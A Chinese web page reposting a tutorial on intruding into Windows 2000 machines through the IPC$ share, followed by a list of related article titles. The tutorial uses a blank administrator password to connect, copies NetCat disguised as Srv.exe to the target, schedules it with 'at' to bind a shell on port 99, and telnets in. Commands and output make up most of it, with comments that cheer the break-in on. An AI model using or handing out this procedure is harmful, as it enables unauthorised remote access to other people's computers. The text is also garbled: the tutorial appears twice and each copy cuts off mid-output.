IPC$入侵2
来源:百度文库 编辑:神马文学网 时间:2024/04/29 01:29:28
IPC$入侵
IPC$入侵
IPC$是Windows的默认共享。其实,这个共享并没有什么漏洞。
我们可以用主机的管理员用户名和密码连接。
问题就出在管理员密码了。直至现在为止,世界上起码有20%的人,把主机密码设置为“空”或者“123”等简单密码。
我们要寻找这些主机十分简单。只需要一个程序就可以。
下面,我会把以前写的一篇IPC$入侵文章,进行小小的修改。
本次范例需要的系统及程序情况如下:
操作系统:Windows 2000
对方操作系统:Windows 2000
程序(一):流光 IV 国际版 (Fluxay Release IV Build 2914 International Edition For NT/2000/XP)
程序(二):Srv.exe
程序(三):Ntlm.exe
本机IP:127.0.0.1
测试IP:127.0.0.25
新程序介绍:
Srv.exe:实际上是NetCat,这里改名为Srv.exe。用于在主机建立一个端口为99的shell。
Ntlm.exe:是小榕写的一个程序,用于修改Windows 2000 Telnet Servery身份验证的方式。
关于扫描的方法,在流光的help目录有一个ipc.mht的文件。里面有使用说明。
假设,我们扫描了一台IPC$主机:127.0.0.25
用户名:davis
密码:空
“//”后是注解。
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
D:>net use \127.0.0.25$ "" /user:"davis" //这是我用流光扫到的密码~~~我们就拿它开刀吧~!
命令成功完成。
D:>copy srv.exe \127.0.0.25$ //先复制srv.exe上去,在流光的Tools目录就有。
已复制 1 个文件。
D:>net time \127.0.0.25 //查查时间。
\127.0.0.25 的当前时间是 2001/1/17 上午 10:48
命令成功完成。
D:>at \\127.0.0.25 10:50 srv.exe //用at命令启动srv.exe吧~!(这里设置的时间要比主机时间快)先去论坛灌几篇帖子。
新加了一项作业,其作业 ID = 1
D:>net time \\127.0.0.25 //再查查够时间没有?!噢~~够了~
127.0.0.25 的当前时间是 2001/1/17 上午 10:51
命令成功完成。
D:>telnet 127.0.0.25 99 //我们telnet吧,注意端口是99哦~
Microsoft Windows 2000 [
IPC$入侵
IPC$是Windows的默认共享。其实,这个共享并没有什么漏洞。
我们可以用主机的管理员用户名和密码连接。
问题就出在管理员密码了。直至现在为止,世界上起码有20%的人,把主机密码设置为“空”或者“123”等简单密码。
我们要寻找这些主机十分简单。只需要一个程序就可以。
下面,我会把以前写的一篇IPC$入侵文章,进行小小的修改。
本次范例需要的系统及程序情况如下:
操作系统:Windows 2000
对方操作系统:Windows 2000
程序(一):流光 IV 国际版 (Fluxay Release IV Build 2914 International Edition For NT/2000/XP)
程序(二):Srv.exe
程序(三):Ntlm.exe
本机IP:127.0.0.1
测试IP:127.0.0.25
新程序介绍:
Srv.exe:实际上是NetCat,这里改名为Srv.exe。用于在主机建立一个端口为99的shell。
Ntlm.exe:是小榕写的一个程序,用于修改Windows 2000 Telnet Servery身份验证的方式。
关于扫描的方法,在流光的help目录有一个ipc.mht的文件。里面有使用说明。
假设,我们扫描了一台IPC$主机:127.0.0.25
用户名:davis
密码:空
“//”后是注解。
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
D:>net use \127.0.0.25$ "" /user:"davis" //这是我用流光扫到的密码~~~我们就拿它开刀吧~!
命令成功完成。
D:>copy srv.exe \127.0.0.25$ //先复制srv.exe上去,在流光的Tools目录就有。
已复制 1 个文件。
D:>net time \127.0.0.25 //查查时间。
\127.0.0.25 的当前时间是 2001/1/17 上午 10:48
命令成功完成。
D:>at \\127.0.0.25 10:50 srv.exe //用at命令启动srv.exe吧~!(这里设置的时间要比主机时间快)先去论坛灌几篇帖子。
新加了一项作业,其作业 ID = 1
D:>net time \\127.0.0.25 //再查查够时间没有?!噢~~够了~
127.0.0.25 的当前时间是 2001/1/17 上午 10:51
命令成功完成。
D:>telnet 127.0.0.25 99 //我们telnet吧,注意端口是99哦~
Microsoft Windows 2000 [
IPC$入侵2
ipc$入侵
ipc$共享入侵
ipc$共享入侵
ipc$入侵与防范
利用ipc$入侵的相关命令
一份详尽的IPC$入侵资料
一份详尽的IPC$入侵资料
菜鸟学黑客 IPC$入侵计算机系统浅析
各个网络端口的入侵 附[135,IPC$入侵详解]
IPC
怎样防止别人用ipc$和默认共享入侵-网络安全-系统安全-Windows-操作系统-网络学...
Port Windows IPC apps to Linux, Part 2: Semap...
什么是ipc$
入侵电脑就这么简单2
IPC和管道简介
如何建立ipc$
Linux IPC 参数设定
关于IPC$详解
基于Snort的入侵检测系统(2)
基于Snort的入侵检测系统(2)
实战入侵邻居MM家的无线路由器2
文化入侵
Hadoop系列-IPC之代码实现